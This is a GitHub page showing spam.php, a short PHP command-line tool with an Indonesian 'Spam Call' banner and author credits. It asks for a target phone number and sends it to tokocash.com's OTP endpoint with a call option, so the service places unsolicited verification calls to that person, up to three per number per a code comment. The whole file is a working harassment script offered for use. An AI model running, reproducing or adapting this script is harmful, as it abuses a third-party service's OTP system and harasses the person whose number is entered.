-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathspam.php
39 lines (39 loc) · 1.44 KB
/
spam.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
// Limit 3x Telpon Setiap Satu Nomor
function send($phone){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.tokocash.com/oauth/otp"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "msisdn=$phone&accept=call"); $asw = curl_exec($ch);
curl_close($ch);
echo $asw."\n";
}
$red = "\e[91m";
echo $red."
╔═╗┌─┐┌─┐┌┬┐ ╔═╗┌─┐┬ ┬
╚═╗├─┘├─┤│││ ║ ├─┤│ │
╚═╝┴ ┴ ┴┴ ┴ ╚═╝┴ ┴┴─┘┴─┘\n\n".$red.
"Lolos ITB 2020/ Rizki\n";
echo $red."
[!] Author : kriz3 [!]
[!] github : github.com/zenkriztao [!]\n\n";
echo $red."
======================================
|[!] ITB/MIT x86_x64 lu=inux inside team [!]|
======================================\n\n";
echo "\n";
echo "\n";
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n";
echo "@ [!] Contoh : 0852***** / 62852****** [!] @\n";
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n";
echo " \n";
echo " \n";
sleep ('0.4');
echo "x86_x64 linux@ Masukan No Hp Target #-> ";
$nomor = trim(fgets(STDIN));
$execute = send($nomor);
print $execute;
?>